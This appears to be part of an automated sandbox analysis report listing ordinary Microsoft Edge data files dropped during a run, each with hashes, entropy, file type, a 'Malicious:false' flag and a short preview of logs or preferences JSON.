                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.828 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/27-04:49:12.829 1f08 Recovering log #3.2024/11/27-04:49:12.829 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):782
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                                                    MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                                                    SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                                                    SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                                                    SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.220405254439
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0by++q2PcNwi23oH+TcwtfrzAdIFUt8YCe0bnAZmw+YCe0bAed3VkwOcNwi2a:fXvvLZYeb9FUt88N/+8YF54ZYeb2J
                                                                                                                                                                                                                                                                                                                    MD5:60E71184748C911027EBF254C6A76DFD
                                                                                                                                                                                                                                                                                                                    SHA1:2FFE55D7C7598798466BFAABE797E71849B3866F
                                                                                                                                                                                                                                                                                                                    SHA-256:B62AC16197706B5599F6940CD68C57579E5660F8E51423C186F3CCC9861C555D
                                                                                                                                                                                                                                                                                                                    SHA-512:FEDB6FB047C966F92DD8B6BEE191B1524B1A2BAFDDC2B62922ADDB6083DCC32DB6858D7ACA1DE9E5A607C1F8C090A265D7A3B9BCE3937941074F8E93C8499469
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.792 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/27-04:49:12.793 1f08 Recovering log #3.2024/11/27-04:49:12.794 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.220405254439
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:HCe0by++q2PcNwi23oH+TcwtfrzAdIFUt8YCe0bnAZmw+YCe0bAed3VkwOcNwi2a:fXvvLZYeb9FUt88N/+8YF54ZYeb2J
                                                                                                                                                                                                                                                                                                                    MD5:60E71184748C911027EBF254C6A76DFD
                                                                                                                                                                                                                                                                                                                    SHA1:2FFE55D7C7598798466BFAABE797E71849B3866F
                                                                                                                                                                                                                                                                                                                    SHA-256:B62AC16197706B5599F6940CD68C57579E5660F8E51423C186F3CCC9861C555D
                                                                                                                                                                                                                                                                                                                    SHA-512:FEDB6FB047C966F92DD8B6BEE191B1524B1A2BAFDDC2B62922ADDB6083DCC32DB6858D7ACA1DE9E5A607C1F8C090A265D7A3B9BCE3937941074F8E93C8499469
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:2024/11/27-04:49:12.792 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/27-04:49:12.793 1f08 Recovering log #3.2024/11/27-04:49:12.794 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
                                                                                                                                                                                                                                                                                                                    SHA-256:45FF59770005DCC4783F16AAA4B917750A5124439C0A13DE34E0B85B2AC61512
                                                                                                                                                                                                                                                                                                                    SHA-512:27420FC78C412A1F430349A39C3E0FD558A4476F1F903E198E69C7D0BD170FFC5C412D8851BBB5105F56220E112B0D7E5240ABA7B3212EA4CBD736AD22067D8C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):44236
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.08953422668976
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kfTKKGf4S8tBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynLt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                                    MD5:AF5276A3A9B0DA56BF2CC4E9055F0114
                                                                                                                                                                                                                                                                                                                    SHA1:B0BE2350C9EAD3A5D403A60B8243AB623C3AF080
